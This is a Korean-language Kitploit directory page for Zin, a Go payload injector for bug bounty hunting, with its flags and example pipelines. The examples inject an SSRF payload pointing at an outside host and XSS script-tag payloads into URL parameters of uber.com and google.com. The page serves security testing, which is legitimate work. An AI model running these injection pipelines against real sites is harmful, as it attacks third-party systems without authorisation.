Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Zin — 버그 바운티를 위한 Go로 작성된 페이로드 인젝터 | Kitploit
도구/GitHubGitHub/ethicalhackingplayground/zin
Web Application ExploitationInformation GatheringPenetration Testing
GitHubethicalhackingplayground/zin

Zin

버그 바운티를 위한 Go로 작성된 페이로드 인젝터

저장소 보기
7026446년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

alt text

버전 1.0

😎 Zin 😎

버그바운티를 위한 페이로드 인젝터, Go로 작성됨

Image from Gyazo

기능

  • 모든 파라미터에 여러 페이로드 주입
  • 모든 파라미터에 단일 페이로드 주입
  • 응답을 출력 폴더에 저장
  • 상태 코드 및 응답 길이 표시
  • 응답에서 패턴 검색 가능
  • 매우 빠름
  • 설정이 간편함

설치

$ go get -u github.com/ethicalhackingplayground/Zin

새로운 기능

-✅ 응답에서 패턴 매칭

-✅ 상태 코드 매칭

인자

root@kitploit:~
      _
     (_)
  _____ _ __
 |_  / | '_ \
  / /| | | | |
 /___|_|_| |_|


바운티가 오기를


  -c int
        동시성 (기본값: 20)
  -g string
        응답에서 일치 항목 검색
  -p string
        사용할 페이로드
  -pL string
        사용할 페이로드 목록
  -s int
        상태 코드로 필터링 (기본값: 200)
        

SSRF 예제

$ subfinder uber.com | gau | grep "=http" | Zin -c 80 -p http://10.82.214.84:31386/foobar.js -g "SUP3R_S3cret_1337_K3y"

XSS 예제

$ subfinder uber.com | gau| Zin -c 80 -p '"><script>alert(matchforthis)script>' -g "matchforthis"

여러 페이로드 주입

$ cat hosts | gau | grep "&" | Zin -c 80 -pL <payloadfile>

서브도메인 스캐닝

$ subfinder -dL domains --silent | gau | Zin -c 80 -p <payload>

파라미터만 테스트

$ echo "google.com" | gau | grep "&" | Zin -c 80 -p '"><script>alert(matchthis)</script<"' -g "matchthis"

여러 호스트

$ cat hosts | gau | Zin -c 80 -p <payload>

바운티를 받으셨다면 커피 한 잔으로 지원해주세요


Buy Me A Coffee
도구 다운로드